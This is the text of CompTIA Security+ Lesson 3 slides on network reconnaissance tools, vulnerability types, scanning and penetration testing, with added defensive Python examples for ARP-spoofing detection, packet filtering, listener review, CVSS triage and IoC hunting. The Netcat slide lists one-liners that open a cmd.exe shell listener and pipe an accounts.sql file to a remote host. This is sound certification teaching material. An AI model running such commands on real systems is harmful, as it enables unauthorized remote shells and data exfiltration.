Performing Security Assessments
Lesson 3
Assess Organizational Security with Network Reconnaissance Tools
Topic 3A
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
Syllabus Objectives Covered
4.1 Given a scenario, use the appropriate tool to assess organizational security
ipconfig, ping, and arp
Footprinting the network layout and rogue system detection
ipconfig/ifconfig/ip
Report the local IP configuration
ping
Test connectivity with a host
Use a ping sweep to detect live hosts on a subnet
arp
Address Resolution Protocol (ARP) cache
Shows IP to Media Access Control (MAC) address mapping
Detect spoofing (validate MAC of default gateway)
Screenshot used with permission from Microsoft.
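The "validate MAC of default gateway" check above can be automated. The following is an added example, not code from the slides or from CompTIA: it parses Windows-style `arp -a` output (the sample text and the baseline gateway MAC are constructed, not from a real network), compares the gateway's cached MAC with a known-good baseline, and flags any MAC that answers for more than one IP address, which is the usual footprint of ARP spoofing.

```python
"""Check an ARP cache listing for signs of ARP spoofing. Constructed example:
the arp output and baseline MAC below are made up, not from a real network."""
import re
from collections import defaultdict

# Constructed sample in the style of Windows `arp -a` output.
SAMPLE_ARP_OUTPUT = """\
Interface: 10.1.0.101 --- 0x4
  Internet Address      Physical Address      Type
  10.1.0.1              00-15-5d-01-ca-fe     dynamic
  10.1.0.50             00-15-5d-01-ab-cd     dynamic
  10.1.0.77             00-15-5d-01-ca-fe     dynamic
  10.1.0.255            ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Assumed known-good gateway address, recorded earlier from a trusted baseline.
GATEWAY_IP = "10.1.0.1"
GATEWAY_BASELINE_MAC = "00:15:5d:01:00:01"

ENTRY_RE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})\s+(\w+)")


def normalize_mac(mac):
    """Lowercase, colon-separated notation regardless of how the tool printed it."""
    return mac.lower().replace("-", ":")


def parse_arp_table(text):
    """Return {ip: mac} for unicast entries; broadcast and IPv4 multicast are skipped."""
    table = {}
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        ip, mac, _entry_type = m.groups()
        mac = normalize_mac(mac)
        if mac == "ff:ff:ff:ff:ff:ff" or mac.startswith("01:00:5e:"):
            continue
        table[ip] = mac
    return table


def find_arp_anomalies(table, gateway_ip, baseline_mac):
    """Flag a changed gateway MAC and any MAC that is mapped to several IPs."""
    findings = []
    gw_mac = table.get(gateway_ip)
    if gw_mac is not None and gw_mac != normalize_mac(baseline_mac):
        findings.append(f"gateway {gateway_ip} MAC changed: baseline "
                        f"{normalize_mac(baseline_mac)}, cache {gw_mac}")
    ips_by_mac = defaultdict(list)
    for ip, mac in table.items():
        ips_by_mac[mac].append(ip)
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            findings.append(f"MAC {mac} mapped to multiple IPs: {', '.join(sorted(ips))}")
    return findings


if __name__ == "__main__":
    table = parse_arp_table(SAMPLE_ARP_OUTPUT)
    for finding in find_arp_anomalies(table, GATEWAY_IP, GATEWAY_BASELINE_MAC):
        print("ALERT:", finding)
```

On the constructed sample the gateway entry no longer matches the baseline and the same MAC is mapped to both the gateway and a workstation address, so both checks fire. A baseline only helps if it was recorded while the network was known to be clean; the same logic works for the `ip neigh` or `arp -n` formats once the regular expression is adapted.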
route and traceroute
route
Show the local routing table
Identify default route and local subnet
Check for suspicious entries
tracert/traceroute
Test the path to a remote host
pathping/mtr
Measure latency
IP Scanners and Nmap
Host discovery
Test whether each host in an IP range responds to probes
Port scan
Test whether a TCP or UDP port accepts connections
Screenshot used with permission from nmap.org.
Service Discovery and Nmap
Service discovery
Scan custom TCP/UDP port ranges
Service and version detection
Fingerprinting each port
Protocol
Application/version
OS type
Device type
Screenshot used with permission from nmap.org.
netstat and nslookup
netstat
Report port status on local machine
Switches to filter by protocol
Display process name or PID that opened port
nslookup and dig
Query name servers
Zone transfers
Screenshot used with permission from Microsoft.
Other Reconnaissance and Discovery Tools
theHarvester
Collate open source intelligence (OSINT)
dnsenum
Collate DNS hosting information, name records, and IP schemas
scanless
Collate results from third-party port scanning sites
curl
Craft and submit protocol requests
Nessus
Perform automated vulnerability scanning
Packet Capture and tcpdump
Packet analysis versus protocol analysis
Sniffer—tool for capturing network frames
Use software to interact with host network driver (libpcap/winpcap)
Mirrored ports/switched port analyzer (SPAN)
Use a test access port (TAP) device to read frames from network media
Placement of sensors
tcpdump
Write to pcap
Read from pcap
Filters
tcpdump -i eth0 "src host 10.1.0.100 and (dst port 53 or dst port 80)"
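To show what "write to pcap", "read from pcap" and "filters" mean at the byte level, here is an added example (not code from the slides or from the tcpdump project): it synthesizes four Ethernet/IPv4 frames, serializes them in the classic pcap format that `tcpdump -w` writes, reads the file back the way `tcpdump -r` does, and applies a predicate equivalent to the filter expression on the slide. The traffic and addresses are constructed, not captured, and checksums are left at zero because nothing on the wire is involved.

```python
"""Write a small pcap file, read it back, and apply the same filter as the tcpdump
command on the slide. Constructed example: frames are synthesized, not captured."""
import io
import struct

PCAP_MAGIC = 0xA1B2C3D4      # little-endian pcap, microsecond timestamps
LINKTYPE_ETHERNET = 1


def ip_to_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))


def build_frame(src_ip, dst_ip, proto, sport, dport, payload=b""):
    """Synthesize Ethernet II + IPv4 + UDP(17)/TCP(6) frame bytes (checksums zero)."""
    if proto == 17:
        l4 = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    elif proto == 6:
        # ports, seq, ack, data offset (5 words), SYN flag, window, checksum, urgent
        l4 = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x02, 8192, 0, 0) + payload
    else:
        raise ValueError("only TCP (6) and UDP (17) are synthesized here")
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0, 64, proto, 0,
                     ip_to_bytes(src_ip), ip_to_bytes(dst_ip))
    eth = bytes.fromhex("00155d000001") + bytes.fromhex("00155d000002") + b"\x08\x00"
    return eth + ip + l4


def write_pcap(frames):
    """Serialize frames as a classic pcap file (the format `tcpdump -w` produces)."""
    out = io.BytesIO()
    out.write(struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET))
    for i, frame in enumerate(frames):
        out.write(struct.pack("<IIII", 1_590_000_000 + i, 0, len(frame), len(frame)))
        out.write(frame)
    return out.getvalue()


def read_pcap(data):
    """Parse a classic pcap file (what `tcpdump -r` reads) and return the raw frames."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic != PCAP_MAGIC:
        raise ValueError("unsupported pcap magic (big-endian/nanosecond variants not handled)")
    frames, offset = [], 24
    while offset + 16 <= len(data):
        _sec, _usec, incl_len, _orig_len = struct.unpack_from("<IIII", data, offset)
        offset += 16
        frames.append(data[offset:offset + incl_len])
        offset += incl_len
    return frames


def parse_frame(frame):
    """Decode IPv4 addresses, protocol and L4 ports; return None for anything else."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    ihl = (frame[14] & 0x0F) * 4
    proto = frame[23]
    src = ".".join(str(b) for b in frame[26:30])
    dst = ".".join(str(b) for b in frame[30:34])
    l4 = 14 + ihl
    if proto not in (6, 17) or len(frame) < l4 + 4:
        return None
    sport, dport = struct.unpack_from("!HH", frame, l4)
    return {"src": src, "dst": dst, "proto": proto, "sport": sport, "dport": dport}


def matches_filter(pkt):
    """Same predicate as: tcpdump "src host 10.1.0.100 and (dst port 53 or dst port 80)"."""
    return pkt is not None and pkt["src"] == "10.1.0.100" and pkt["dport"] in (53, 80)


# Constructed traffic: two frames should match the filter, two should not.
SAMPLE_FRAMES = [
    build_frame("10.1.0.100", "10.1.0.1", 17, 53211, 53),   # DNS query: matches
    build_frame("10.1.0.100", "10.2.0.5", 6, 40000, 80),    # HTTP SYN: matches
    build_frame("10.1.0.100", "10.2.0.5", 6, 40001, 443),   # HTTPS: wrong dst port
    build_frame("10.1.0.50", "10.1.0.1", 17, 53212, 53),    # DNS: wrong src host
]
SAMPLE_PCAP = write_pcap(SAMPLE_FRAMES)


def filter_capture(data):
    """Read a pcap and return the decoded packets that satisfy the filter."""
    return [p for p in (parse_frame(f) for f in read_pcap(data)) if matches_filter(p)]


if __name__ == "__main__":
    for pkt in filter_capture(SAMPLE_PCAP):
        print(pkt)
```

Writing `SAMPLE_PCAP` to disk produces a file that Wireshark and `tcpdump -r` open normally, which is a convenient way to check that a sensor's display filter behaves the way you expect before relying on it on live traffic.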
Packet Analysis and Wireshark
Output panes
Packet list
Packet details (headers and fields)
Packet bytes (hex and ASCII)
Capture and display filters
Coloring rules
Follow TCP Stream
Screenshot used with permission from wireshark.org.
Packet Injection and Replay
Packet injection
Crafting spoofed packets
Dsniff, Ettercap, Scapy
hping
Host/port detection and firewall testing
Traceroute
Denial of service (DoS)
tcpreplay
Stream a packet capture through an interface
Sandbox analysis and intrusion detection testing
Exploitation Frameworks
Simulate adversary tools for exploitation and backdoor access
Metasploit
Modules to exploit known code vulnerabilities
Couple exploit module with payload
Obfuscate code to evade detection
Sn1Per
Penetration test reporting and evidence gathering
Run automated suites of tests
Other frameworks
Linux, embedded, browser, web/mobile app, cloud, …
Screenshot used with permission from metasploit.com
Netcat
Simple tool capable of a very wide range of network tasks
Port scanning and fingerprinting
Command prompt listener over arbitrary port
File transfer over arbitrary port
echo "head" | nc 10.1.0.1 -v 80
nc -l -p 666 -e cmd.exe
type accounts.sql | nc 10.1.0.192 6666
Review Activity: Organizational Security with Network Reconnaissance Tools
Lab Activity: Assisted Labs
Scanning and Identifying Network Nodes
Intercepting and Interpreting Network Traffic with Packet Sniffing Tools
Explain Security Concerns with General Vulnerability Types
Topic 3B
Syllabus Objectives Covered
1.6 Explain the security concerns associated with various types of vulnerabilities
Software Vulnerabilities and Patch Management
Exploits for faults in software code
Applications
Different impacts and exploit scenarios
Client versus server apps
Operating system (OS)
Obtain high level privileges
Firmware
PC firmware
Network appliances and Internet of Things devices
Improper or weak patch management
Undocumented assets
Failed updates and removed patches
Zero-day and Legacy Platform Vulnerabilities
Zero-day
Vulnerability is unknown to the vendor
Threat actor develops an exploit for which there is no patch
Likely to be used against high value targets
Legacy platform
Vendor no longer releases security patches
Weak Host Configurations
Default settings
Vendor may not release product in a default-secure configuration
Unsecured root accounts
Threat actor will gain complete control
Limit ability to log in as superuser
Open permissions
Configuration errors allowing unauthenticated access
Allowing write access when only read access is appropriate
Weak Network Configurations
Open ports and services
Restrict using an access control list
Disable unnecessary services or block ports
Block at network perimeter
Unsecure protocols
Cleartext data transmissions are vulnerable to snooping and eavesdropping
Weak encryption
Storage and transport encryption
Key is generated from a weak password
Cipher has weaknesses
Key distribution is not secure
Errors
Error messages that reveal too much information
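The netstat slide (report port status, show the PID that opened a port) and the "open ports and services" item above describe the same review: list what is listening and compare it against what the host is supposed to run. The following is an added example, not code from the slides or from CompTIA: it parses constructed `netstat -ano` style text, joins each listener to a constructed PID-to-image map of the kind `tasklist` would give, and reports anything not on an assumed allowlist for the host's role, which is the input for the "disable unnecessary services or block ports" decision.

```python
"""Review listening ports from netstat output against an allowlist of expected
services. Constructed example: the netstat text, PID map and allowlist are made up."""
import re

# Constructed sample in the style of `netstat -ano` on Windows.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       896
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1204
  TCP    0.0.0.0:6666           0.0.0.0:0              LISTENING       5120
  TCP    10.1.0.101:49710       10.1.0.1:443           ESTABLISHED     2312
  TCP    127.0.0.1:8080         0.0.0.0:0              LISTENING       3344
  UDP    0.0.0.0:500            *:*                                    2180
"""

# Assumed PID -> image name mapping, as `tasklist` would show it (constructed).
SAMPLE_PIDS = {896: "svchost.exe", 4: "System", 1204: "svchost.exe",
               5120: "nc.exe", 2312: "chrome.exe", 3344: "python.exe", 2180: "svchost.exe"}

# Assumed allowlist for this host role: port -> process image expected to own it.
ALLOWED_LISTENERS = {135: "svchost.exe", 445: "System", 3389: "svchost.exe", 500: "svchost.exe"}

LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)\s+(?:(\w+)\s+)?(\d+)\s*$")


def parse_listeners(text):
    """Return (proto, local_addr, port, pid) for TCP listeners and all UDP sockets."""
    listeners = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proto, addr, port, _foreign, state, pid = m.groups()
        if proto == "TCP" and state != "LISTENING":
            continue  # established/outbound sessions are not open services
        listeners.append((proto, addr, int(port), int(pid)))
    return listeners


def review_listeners(listeners, pid_names, allowlist):
    """Report listeners that are not on the allowlist or are owned by an unexpected image."""
    findings = []
    for proto, addr, port, pid in listeners:
        image = pid_names.get(pid, "<unknown>")
        expected = allowlist.get(port)
        if expected is None:
            findings.append(f"{proto} {addr}:{port} pid {pid} ({image}): not in allowlist")
        elif expected != image:
            findings.append(f"{proto} {addr}:{port} pid {pid} ({image}): expected {expected}")
    return findings


if __name__ == "__main__":
    for finding in review_listeners(parse_listeners(SAMPLE_NETSTAT), SAMPLE_PIDS, ALLOWED_LISTENERS):
        print("REVIEW:", finding)
```

The constructed data yields two findings: a listener on 6666 owned by an image that is not part of the build, and a loopback-only service on 8080. The second is lower risk because it is not reachable from the network, but it is still reported so the reviewer decides, rather than the script.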
Impacts from Vulnerabilities
Data breaches and data exfiltration impacts
Data breach is where confidential data is read or transferred without authorization
Data exfiltration is the methods and tools by which an attacker transfers data without authorization
Identity theft
Abuse of data from privacy breaches
Data loss and availability loss impacts
Availability is also a critical security property
Financial and reputation impacts
Third-Party Risks
Supply chains
Due diligence
Weak links
Vendor management
Process for selecting suppliers and evaluating risks
System integration
Lack of vendor support
Outsourced code development
Data storage
Cloud-based versus on-premises risks
Review Activity: Security Concerns with General Vulnerability Types
Summarize Vulnerability Scanning Techniques
Topic 3C
Syllabus Objectives Covered
1.7 Summarize the techniques used in security assessments
Security Assessment Frameworks
Methodology and scope for security assessments
NIST SP 800-115
Testing
Examining
Interviewing
Vulnerability assessment versus threat hunting and penetration testing
Vulnerability assessments can use a mix of manual procedures and automated scanning tools
Vulnerability Scan Types
Automated scanners configured with list of known vulnerabilities
Network vulnerability scanner
Configured with tests for most types of network hosts
Focused on scanning OS plus some desktop and server applications
Application and web application scanners
Configured with application-specific tests
Screenshot used with permission from Greenbone Networks (openvas.org).
Common Vulnerabilities and Exposures
Vulnerability feed/plug-in/test
Security Content Automation Protocol (SCAP)
Mechanism for updating scanner via feed
Common identifiers
Common Vulnerabilities and Exposures (CVE)
Common Vulnerability Scoring System (CVSS)
| Score | Description |
| --- | --- |
| 0.1+ | Low |
| 4.0+ | Medium |
| 7.0+ | High |
| 9.0+ | Critical |
Intrusive versus Non-intrusive Scanning
Remote scanning versus agent-based scanning
Non-intrusive scanning
Passively test security controls
Scanners attach to network and only sniff traffic
Possibly some limited interaction with hosts (port scanning/banner grabbing)
Intrusive/active scanning
Establish network session
Agent-based scan
Exploitation frameworks
Highly intrusive/risk of system crash
Used with penetration testing
Credentialed versus Non-credentialed Scanning
Non-credentialed
Anonymous or guest access to host only
Might test default passwords
Credentialed
Scan configured with logon
Can allow privileged access to configuration settings/logs/registry
Use dedicated account for scanning
Screenshot used with permission from Greenbone Networks (openvas.org).
False Positives, False Negatives, and Log Review
Analyzing and validating scan report contents
False positives
Scanner identifies a vulnerability that is not actually present
False negatives
Scanner fails to identify a vulnerability
Review logs to confirm results
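The CVSS banding table and the "review logs to confirm results" point come together when a scan report is triaged. The following is an added example, not code from the slides or from any scanner vendor: it bands constructed findings into the severity labels from the CVSS slide and cross-checks each one against a constructed host inventory (the kind of evidence a credentialed scan, a package manager log or a patch log provides). A finding whose installed version already meets the fixed version is marked a likely false positive, a typical result when a non-credentialed scanner judges only by a stale banner. Hosts, versions and the `CVE-PLACEHOLDER-n` identifiers are placeholders, not real CVEs.

```python
"""Triage constructed vulnerability-scan findings: band CVSS base scores into the
severity labels from the slide and cross-check each finding against host inventory
to mark likely false positives. Hosts, versions and CVE ids are placeholders."""

# Severity bands as given on the CVSS slide (checked from the highest threshold down).
CVSS_BANDS = [(9.0, "Critical"), (7.0, "High"), (4.0, "Medium"), (0.1, "Low")]


def cvss_severity(score):
    """Map a CVSS base score to its qualitative severity label."""
    if not 0.0 <= score <= 10.0:
        raise ValueError("CVSS base scores range from 0.0 to 10.0")
    for threshold, label in CVSS_BANDS:
        if score >= threshold:
            return label
    return "None"


def version_tuple(version):
    """Turn a dotted numeric version string into a comparable tuple."""
    return tuple(int(part) for part in version.split("."))


# Constructed findings from a non-credentialed (banner-based) scan.
SCAN_FINDINGS = [
    {"host": "10.1.0.10", "port": 22, "cve": "CVE-PLACEHOLDER-1", "cvss": 9.8,
     "product": "sshd", "banner_version": "7.4", "fixed_in": "7.5"},
    {"host": "10.1.0.10", "port": 80, "cve": "CVE-PLACEHOLDER-2", "cvss": 5.3,
     "product": "httpd", "banner_version": "2.4.6", "fixed_in": "2.4.30"},
    {"host": "10.1.0.20", "port": 443, "cve": "CVE-PLACEHOLDER-3", "cvss": 7.5,
     "product": "tls-lib", "banner_version": "1.0.2", "fixed_in": "1.0.3"},
]

# Constructed inventory from a credentialed source (package manager / patch logs):
# (host, product) -> installed version. The httpd banner is stale; the package was updated.
HOST_INVENTORY = {
    ("10.1.0.10", "sshd"): "7.4",
    ("10.1.0.10", "httpd"): "2.4.37",
}

STATUS_ORDER = {"confirmed": 0, "unverified": 1, "likely false positive": 2}


def triage(findings, inventory):
    """Label each finding with severity and verification status, worst first."""
    results = []
    for f in findings:
        installed = inventory.get((f["host"], f["product"]))
        if installed is None:
            status = "unverified"             # no log/inventory evidence either way
        elif version_tuple(installed) >= version_tuple(f["fixed_in"]):
            status = "likely false positive"  # patched; scanner judged by the old banner
        else:
            status = "confirmed"
        results.append({**f, "severity": cvss_severity(f["cvss"]), "status": status})
    results.sort(key=lambda r: (STATUS_ORDER[r["status"]], -r["cvss"]))
    return results


if __name__ == "__main__":
    for r in triage(SCAN_FINDINGS, HOST_INVENTORY):
        print(f'{r["host"]}:{r["port"]} {r["cve"]} {r["severity"]:8} {r["status"]}')
```

The cross-check can only reduce false positives; it says nothing about false negatives, since a vulnerability the scanner never reported does not appear in the input. That gap is why the slides pair scan review with independent log review and configuration review.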
Screenshot used with permission from Greenbone Networks (openvas.org).
Configuration Review
Lack of controls
Security controls that should be present but are not (or are not functioning)
Misconfiguration
Settings deviate from template configuration
Driven by templates of configuration settings
Open Vulnerability and Assessment Language (OVAL)
Extensible Configuration Checklist Description Format (XCCDF)
Compliance-based templates available in many products
Screenshot used with permission from Microsoft.
Threat Hunting
Use log and threat data to search for IoCs
Advisories and bulletins
Plan threat hunting project in response to newly discovered threat
Intelligence fusion and threat data
Use security information and event management (SIEM) and threat data feed to automate searches
Maneuver
Consider possibility of alerting adversary to the search
Use techniques that will give positional advantage
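The automated search described above ("use log and threat data to search for IoCs") reduces to extracting candidate indicators from each log line and intersecting them with the indicator set from the advisory. The following is an added example, not code from the slides, from CompTIA or from any SIEM product: the indicator values (documentation-range IP addresses, `.example` domains, an all-zero placeholder hash) and the log lines are constructed, so nothing in it is real threat data. It returns both the hits and a per-indicator coverage count, so an indicator that was never seen is visibly distinguished from one that was searched for and not found.

```python
"""Search constructed log lines for indicators of compromise (IoCs) from an advisory.
All IoC values and log lines are constructed placeholders, not real threat data."""
import re
from collections import Counter

# Assumed indicator set as it might be lifted from an advisory (constructed values).
IOCS = {
    "ip": {"198.51.100.23", "203.0.113.77"},              # RFC 5737 documentation ranges
    "domain": {"update-cdn.example", "login-portal.example"},
    "sha256": {"0" * 63 + "1"},                             # placeholder hash
}

# Constructed log lines in a key=value style similar to SIEM-normalized events.
SAMPLE_LOGS = [
    "2020-06-01T10:02:11Z firewall src=10.1.0.101 dst=198.51.100.23 dport=443 action=allow",
    "2020-06-01T10:02:12Z dns client=10.1.0.101 query=Update-CDN.example type=A",
    "2020-06-01T10:03:40Z edr host=WS-17 process=svchost.exe sha256=" + "0" * 63 + "1",
    "2020-06-01T10:05:02Z firewall src=10.1.0.55 dst=192.0.2.10 dport=80 action=allow",
    "2020-06-01T10:06:30Z dns client=10.1.0.60 query=www.example.org type=A",
]

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)
HASH_RE = re.compile(r"\b[0-9a-f]{64}\b", re.IGNORECASE)


def extract_candidates(line):
    """Pull every IP, host name and SHA-256-shaped token out of one log line."""
    return {
        "ip": set(IP_RE.findall(line)),
        "domain": {d.lower() for d in DOMAIN_RE.findall(line)},   # case-fold before matching
        "sha256": {h.lower() for h in HASH_RE.findall(line)},
    }


def hunt(lines, iocs):
    """Return (hits, seen): hits are (line_no, kind, value, line); seen counts each IoC found."""
    hits = []
    seen = Counter()
    for line_no, line in enumerate(lines, 1):
        candidates = extract_candidates(line)
        for kind, values in candidates.items():
            for value in sorted(values & iocs.get(kind, set())):
                hits.append((line_no, kind, value, line))
                seen[(kind, value)] += 1
    return hits, seen


def unseen_iocs(iocs, seen):
    """Indicators that were searched for but never matched: useful for the hunt report."""
    return sorted((kind, v) for kind, values in iocs.items() for v in values if seen[(kind, v)] == 0)


if __name__ == "__main__":
    hits, seen = hunt(SAMPLE_LOGS, IOCS)
    for line_no, kind, value, line in hits:
        print(f"line {line_no}: {kind} {value} <- {line}")
    print("not observed:", unseen_iocs(IOCS, seen))
```

Note that the domain pattern also picks up tokens such as `svchost.exe`; that is harmless here because candidates are only reported when they intersect the indicator set, but it is the reason to match against a set rather than to alert on every extracted token.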
Review Activity: Vulnerability Scanning Techniques
Lab Activity: Assisted Labs
Analyzing the Results of a Credentialed Vulnerability Scan
Explain Penetration Testing Concepts
Topic 3D
Syllabus Objectives Covered
1.8 Explain the techniques used in penetration testing
Penetration Testing
Pen test or ethical hacking
Verify threat
Identify vulnerability and the vector by which it could be exploited
Bypass security controls
Identify lack of controls or ways to circumvent existing controls
Actively test security controls
Examine weaknesses that render controls ineffective
Exploit vulnerabilities to prove threat exists (“pwned”)
Active and highly intrusive techniques, compared to vulnerability assessment
Rules of Engagement
Agreement for objectives and scope
Authorization to proceed from system owner and affected third parties
Attack profile
Black box (unknown environment)
White box (known environment)
Gray box (partially known environment—to model insider threat agents, for instance)
Bug bounty programs
Exercise Types
Red team
Performs the offensive role
Blue team
Performs the defensive role
White team
Sets the rules of engagement and monitors the exercise
Purple team
Exercise set up to encourage collaboration
Red and blue teams share information and debrief regularly
Might be assisted by a facilitator
Passive and Active Reconnaissance
Pen testing and kill chain attack life cycle
Reconnaissance phase
Passive techniques unlikely to alert target
Active techniques are detectable
Open Source Intelligence (OSINT)
Social engineering
Footprinting
War driving
Drones/unmanned aerial vehicle (UAV) and war flying
Pen Test Attack Life Cycle
Initial exploitation
Obtain a foothold via an exploit
Persistence
Establish a command & control backdoor
Reconnect across host shutdown/user logoff events
Privilege escalation
Internal reconnaissance
Gain additional credentials and compromise higher privilege accounts
Lateral movement
Compromise other hosts
Pivoting
Access hosts with no direct remote connection via a pivot host
Actions on objectives
Cleanup
Review Activity: Penetration Testing Concepts
Summary
Lesson 3